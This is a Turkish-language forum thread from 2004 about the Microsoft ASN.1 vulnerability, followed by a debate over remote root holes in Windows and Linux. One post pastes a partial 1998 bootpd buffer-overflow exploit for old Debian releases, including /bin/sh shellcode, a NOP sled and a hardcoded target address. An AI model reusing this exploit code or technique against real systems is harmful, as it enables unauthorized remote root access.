sharky Mesaj tarihi: Şubat 12, 2004 Paylaş Mesaj tarihi: Şubat 12, 2004 California merkezli eEye Digital Security firmasından güvenlik sorumlusu Marc Maiffret´in açıklamasına göre Microsoft ASN.1 (Abstract Syntax Notation 1) açığı şimdiye dek Microsoft Windows işletim sistemi ailesinde bulunmuş en önemli açıklardan biri. Bu açıktan faydalanan kötü niyetli bir yazılım uzaktan sisteminize erişip onaylanmamış herhangi bir kodu yükleyip sistem ayrıcalıkları ile çalıştırabiliyor. Microsoft´tan alınan bilgiye göre bu açık Windows NT 4.0, Windows 2000, Windows XP ve Windows Server 2003 işletim sistemlerini etkiliyor ve kritik hata kategorisinde. Maiffret´e göre açığın tespit edilip Microsoft´a bildirilmesi ile gerekli yamanın çıkarılması arasında geçen süre 200 gün. Eğer MS Windows işletim sistemlerinden birini kullanıyorsanız lütfen gerekli yamayı sisteminize yüklediğinizden emin olun (aşağıdaki bağlantılardan faydalanabilirsiniz). Kaynaklar: - SearchSecurity - Microsoft Security Bulletin MS04-007 Alıntı : www.fazlamesai.net[signature][hline]There are 10 types of people in the world: Those who understand binary, and those who don't.. -EE Unix/Linux Sys. Adm., Security Prov., Programmer, IT Depart. PM Google Search : "Türkiyenin en iyi hosting firması" Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
neter Mesaj tarihi: Şubat 12, 2004 Paylaş Mesaj tarihi: Şubat 12, 2004 tek kelime : oha[signature][hline]Ethernass Dünyası Admin Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
Arkansis Mesaj tarihi: Şubat 13, 2004 Paylaş Mesaj tarihi: Şubat 13, 2004 e windows bu olacak , daha neler var Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
wanderer Mesaj tarihi: Şubat 13, 2004 Paylaş Mesaj tarihi: Şubat 13, 2004 klasik olaylar bunlar, abartmayalim. windows update'e bakarsaniz surekli "for example, it allows code execution" diyen bi hata gorursunuz hehe :) gecen de 2.4 2.2 ve 2.6 kernellerini iceren bi acigi bulunmustu linux'un. yine code execution. isletim sistemlerinin klasik problemidir hehe.[signature][hline]raki asmis biseydir Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
sharky Mesaj tarihi: Şubat 13, 2004 Konuyu açan Paylaş Mesaj tarihi: Şubat 13, 2004 2.4.x ve 2.6.x de çok açık bulundu, ama local root exploiti veren şu ana kadar duymadım.. Yani 2.4.x ve 2.6.x serisinden. Esas sorun, Windows bunları remote root exploit olarak veriyor. Linux'ta nereye remote dan root alıyormuşsun kernelden ?[signature][hline]There are 10 types of people in the world: Those who understand binary, and those who don't.. -EE Unix/Linux Sys. Adm., Security Prov., Programmer, IT Depart. PM Google Search : "Türkiyenin en iyi hosting firması" Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
Arkansis Mesaj tarihi: Şubat 13, 2004 Paylaş Mesaj tarihi: Şubat 13, 2004 Zaten her windows muhalefetini olağanüstü ve veri kaybına yol açacak şekilde bile olsa , olağanüstü değil herzaman oluyor diye diye bu raddeye kadar sömürttük kendimizi. Çok önemli bir word dosyasında bir konuşma yazıyorsun ara ara save alman gerek , ama unutuyorsun almayı , explorer en alakasız yerde patlıyor bütün işlerin iptal .. ama ne o ? sıradan bir olay bu önemsenecek değil. iddia ediyorum bu windows sürümlerinde sonsuza kadar açık cıkacaktır. Kusursuz işletim sistemi olmaz değil olay, patchlerin yapılmasına rağmen güncellemelere rağmen sürekli bozulacak bu [Bu mesaj Arkansis tarafından 13 February 2004 18:40 tarihinde değiştirilmiştir] Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
Genel Yönetici orc_lord Mesaj tarihi: Şubat 13, 2004 Genel Yönetici Paylaş Mesaj tarihi: Şubat 13, 2004 abi microsoft'unda işi zor bence paso millet düşman açıklarını buluyor :) daha sonra yeni versionunda bu açıklarını kapaması fln yani zor tabi..[signature][hline]===> orc_lord <=== Buddy'nin resimlerine gider.. Çok abuk subuk bir ismim var bana artık orc da diyebilirsiniz sadece orc :-p Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
Genel Yönetici orc_lord Mesaj tarihi: Şubat 13, 2004 Genel Yönetici Paylaş Mesaj tarihi: Şubat 13, 2004 topice sticky isteriz..[signature][hline]===> orc_lord <=== Buddy'nin resimlerine gider.. Çok abuk subuk bir ismim var bana artık orc da diyebilirsiniz sadece orc :-p Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
MartinLGore Mesaj tarihi: Şubat 13, 2004 Paylaş Mesaj tarihi: Şubat 13, 2004 said: sharky, 13 February 2004 18:36 tarihinde demiş ki: Linux'ta nereye remote dan root alıyormuşsun kernelden ? Eski kernel sürümlerinde bu tip açıklar çıktı sharky.. Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
sharky Mesaj tarihi: Şubat 13, 2004 Konuyu açan Paylaş Mesaj tarihi: Şubat 13, 2004 Yukarda 2.4 ve 2.6 serisinden bahsediyorum :) Aynı zamanda eski hangi sürümde ? Remote root dan bahsediyoruz.. Öncelikle bir servis çalışmalı.. Bana o remote root exploiti olan kerneli söyle, bir makina kurayım, girebilene aşkolsun. Belirli bir port bind edilmedikten sonra, kernel hiçbir zaman kafasından bir port bind edip bir hizmet sunmaz ordan. Ha eğer bu remote root Apache x.x.x ile olmuşsa, o Apache 'nin bugıdır.. Ha Apache yardımı ile kerneli kullanarak bir exploit yaratılmışsa, burada ilk düşünülmesi gereken, ben Apache'nin bu olayını nasıl kaparım olmalı.. Kernel daha sonra.[signature][hline]There are 10 types of people in the world: Those who understand binary, and those who don't.. -EE Unix/Linux Sys. Adm., Security Prov., Programmer, IT Depart. PM Google Search : "Türkiyenin en iyi hosting firması" Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
Arthur_HellsFire Mesaj tarihi: Şubat 13, 2004 Paylaş Mesaj tarihi: Şubat 13, 2004 orjinal bişiyimiz olmıcak demek paso yamalıyoz :lol: Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
MartinLGore Mesaj tarihi: Şubat 14, 2004 Paylaş Mesaj tarihi: Şubat 14, 2004 Debian Linux 1.3'ün remote exploiti var.. /* * Bootpd Exploit against debian linux 1.3 and 2.0 and possibly other * * (C) 1998 Willem Pinckaers [email protected] * * * Broken ass code fixed by Bronc Buster - Dec 1998 * * If you get this and it's missing the two .h files * just forget it (unless you are lucky and have them already) * Anyone with half a brain could of fixed this to work, so if * you are using this now, either I gave it to you, or you are * a k0d3 kIdDi3 ;) * * to complie: gcc bootpd.c -o bootp * */ #include #include #include #include #include #include #include "bootp.h" #define MAX_MSG_SIZE 500 char shellcode[] = "x31" "xc9" "x89" "xc8" "x04" "x66" "x41" "x89" "xca" "x89" "xcb" "xeb" "x7f" "x5f" "x89" "x4f" "x08" "x41" "x89" "x4f" "x04" "x80" "xc1" "x04" "x89" "x4f" "x0c" "x8d" "x4f" "x04" "xcd" "x80" "x89" "x07" "x31" "xc9" "x80" "xc1" "x02" "x66" "x89" "x4f" "x0c" "x66" "x89" "x4f" "x0e" "x80" "xc1" "x0e" "x66" "x89" "x4f" "x08" "x66" "xb9" "x30" "x39" "x66" "x89" "x4f" "x0e" "x8d" "x47" "x0c" "x89" "x47" "x04" "x31" "xc9" "xb1" "x03" "x89" "xca" "x89" "xcb" "x89" "xf9" "x31" "xc0" "x04" "x66" "xcd" "x80" "x31" "xc0" "x89" "xc1" "x04" "x3f" "x89" "xc2" "x8b" "x1f" "xcd" "x80" "x89" "xd0" "x41" "xcd" "x80" "x89" "xd0" "x41" "xcd" "x80" "x31" "xc0" "x89" "x47" "x10" "x88" "x47" "x1b" "x8d" "x47" "x14" "x89" "x47" "x0c" "x31" "xc0" "x04" "x0b" "x8d" "x5f" "x14" "x8d" "x4f" "x0c" "x8d" "x57" "x10" "xcd" "x80" "x31" "xc0" "x40" "xcd" "x80" "xe8" "x7c" "xff" "xff" "xff" "x2e" "x41" "x41" "x41" "x41" "x41" "x41" "x41" "x41" "x41" "x41" "x41" "x41" "x41" "x39" "x30" "xc0" "xa8" "x01" "x01" "x2f" "x62" "x69" "x6e" "x2f" "x73" "x68" "x00"; #define SERVER_PORT 67 char client_addr[16] = "127.000.000.001"; char host_addr[16] = "207.053.133.005"; int realpath_adjust = 0; int exploit_length = 1200; struct sockaddr_in server_addr; void sendpacket(int, struct bootp *); void build_packet(struct bootp *, int, char**); void get_args(int, char**); void usage(void); int main(int argc, char *argv[]) { struct bootp* bp; int s; get_args(argc, argv); server_addr.sin_family = AF_INET; server_addr.sin_port = htons(SERVER_PORT); server_addr.sin_addr.s_addr = inet_addr(host_addr); if ((s = socket(AF_INET, SOCK_DGRAM, 0)) < 0) { fprintf(stderr, "cannot create socketn"); exit(1); } if ((bp = (struct bootp*) malloc(MAX_MSG_SIZE + 1000)) == NULL) { (void) fprintf(stderr, "Cannot malloc.n"); exit(1); }; (void) memset(bp, 0, MAX_MSG_SIZE + 1000); /* ai exploit isn't secure */ build_packet(bp, argc, argv); sendpacket(s, bp); } void sendpacket(int s, struct bootp *bp) { if (sendto(s, (const void *) bp, MAX_MSG_SIZE, 0, (const struct sockaddr *) &server_addr, sizeof(struct sockaddr_in)) == -1) { fprintf(stderr, "sendpacket: sendto returned -1 ;(n"); exit(1); } } void build_packet(struct bootp *bp, int argc, char *argv[]) { unsigned long start_realpath = 0xbffff684 + realpath_adjust; unsigned long addr_ret_addr = start_realpath + 8 + 0x488; unsigned long temp_addr, temp_addr2 = 0; int length_tftpdir = 1; // no ftpdir just a slash at the start.. int num_nops = 600; char *p; unsigned long *q; int i; bp->bp_op = BOOTREQUEST; bp->bp_xid = 58524; bp->bp_htype = HTYPE_ETHERNET; bp->bp_hlen = 6; bp->bp_ciaddr.s_addr = inet_addr(client_addr); printf("Using: client: %sn", client_addr); printf("Using: server: %sn", host_addr); printf("Addr of realpath: %xn", start_realpath); p = bp->bp_file; /* Putting in nops */ for (i = 0; i < num_nops; i++) *p++ = 0x90; printf("Added: %d nopsn", num_nops); /* Putting in shellcode */ for(i = 0; i < strlen(shellcode); i++) *p++ = shellcode[i]; printf("%d bytes of shellcode added.n", strlen(shellcode)); /* Aligning to make sure the ret_addr is placed correctly */ temp_addr = p - bp->bp_file + length_tftpdir + start_realpath; for(i = 0; i < (addr_ret_addr - temp_addr) % 4; i++) *p++ = 'a'; printf("%d bytes of alignment added.n", (addr_ret_addr - temp_addr) %4); /* set return adress.. hopefully in exploit code.... */ temp_addr2 = start_realpath + length_tftpdir + (num_nops / 2); if (!(temp_addr2 & 0xff)) temp_addr2++; printf("Setting return addr to: %x n", temp_addr2); q = (unsigned long *) p; do { *q++ = temp_addr2; p = (char *) q; } while ((p - bp->bp_file) < exploit_length); *p++ = ''; printf("Exploit length: %d n", strlen(bp->bp_file)); } void get_args(int argc, char *argv[]) { int ch; while ((ch = getopt(argc, argv, "c:s:a:e:")) != EOF) Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
sharky Mesaj tarihi: Şubat 14, 2004 Konuyu açan Paylaş Mesaj tarihi: Şubat 14, 2004 Yine dediklerimi anlamamissin. printf("bootpd exploit against debian linux 1.3 and 2.0 (probably others)n"; Bak ne yaziyor ? Bootpd.. Yani Bootp daemonun acigi bu. Bootpd yi kapatirsan, boyle bir acik soz konusu olmaz. Yani olay yine direk olarak Kernel ile iliskili degil. Gecenlerde de Proftpd nin acigi vardi, 2-3 ay once. Bunun da kernel ile ilgisi yoktu. Ya ben anlatamiyorum, ya da anlamamakta direniyorsunuz.[signature][hline]There are 10 types of people in the world: Those who understand binary, and those who don't.. -EE Unix/Linux Sys. Adm., Security Prov., Programmer, IT Depart. PM Google Search : "Türkiyenin en iyi hosting firması" Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
kavel Mesaj tarihi: Şubat 14, 2004 Paylaş Mesaj tarihi: Şubat 14, 2004 Ehe sharky hiç uğraşma bence : ) Anlamıo o ben senden önce test ettim ama REJECTED yani :P eueuhe[signature][hline]Uniyasam.Com Admin / ICQ#85889898 Grafiker ( Corel Draw & Photoshop ). Autocad öğrenmek zorunda kalmış olan kişi. Fizik okumayı bilinçli olarak seçen bilgisayar manyağı ve ruh sağlığı yerinde olmayan biri. sharky, 08 January 2004 00:30 tarihinde demiş ki: Sakin olalim. Sakin sakin cevap verelim. Zorla sakinlestirilmek icin parmak kaldirmayalim. Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
Öne çıkan mesajlar